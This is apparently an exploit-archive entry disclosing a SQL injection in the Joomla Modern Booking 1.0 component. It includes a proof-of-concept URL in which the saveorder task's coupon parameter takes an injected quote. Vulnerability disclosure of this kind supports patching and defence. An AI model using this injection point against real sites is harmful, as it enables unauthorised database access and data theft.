Joomla Modern Booking 1.0 Component - coupon Parameter SQL Injection Vulnerability

2017-03-23T00:00:00
ID 1337DAY-ID-27408
Type zdt
Reporter Hamed Izadi
Modified 2017-03-23T00:00:00

Description

Exploit for php platform in category web applications

                                        
                                            ###############################################################################################
# Exploit Title: Joomla Modern Booking  - SQL Injection
 
               # Author: [ Hamed Izadi ]
 
                        #IRAN
 
# Vendor Homepage :
https://extensions.joomla.org/extensions/extension/vertical-markets/booking-a-reservations/modern-booking/
# Vendor Homepage : https://www.unikalus.com/
# Category: [ Webapps ]
# Tested on: [ Ubuntu ]
# Versions: 1.0
# Date: March 22, 2017
 
 
# PoC:
# coupon Parameter Vulnerable To SQLi
 
# Demo:
# https://server/modern-booking-slots?task=saveorder&coupon=test"&start=&option=com_modern_booking

#  0day.today [2018-03-01]  #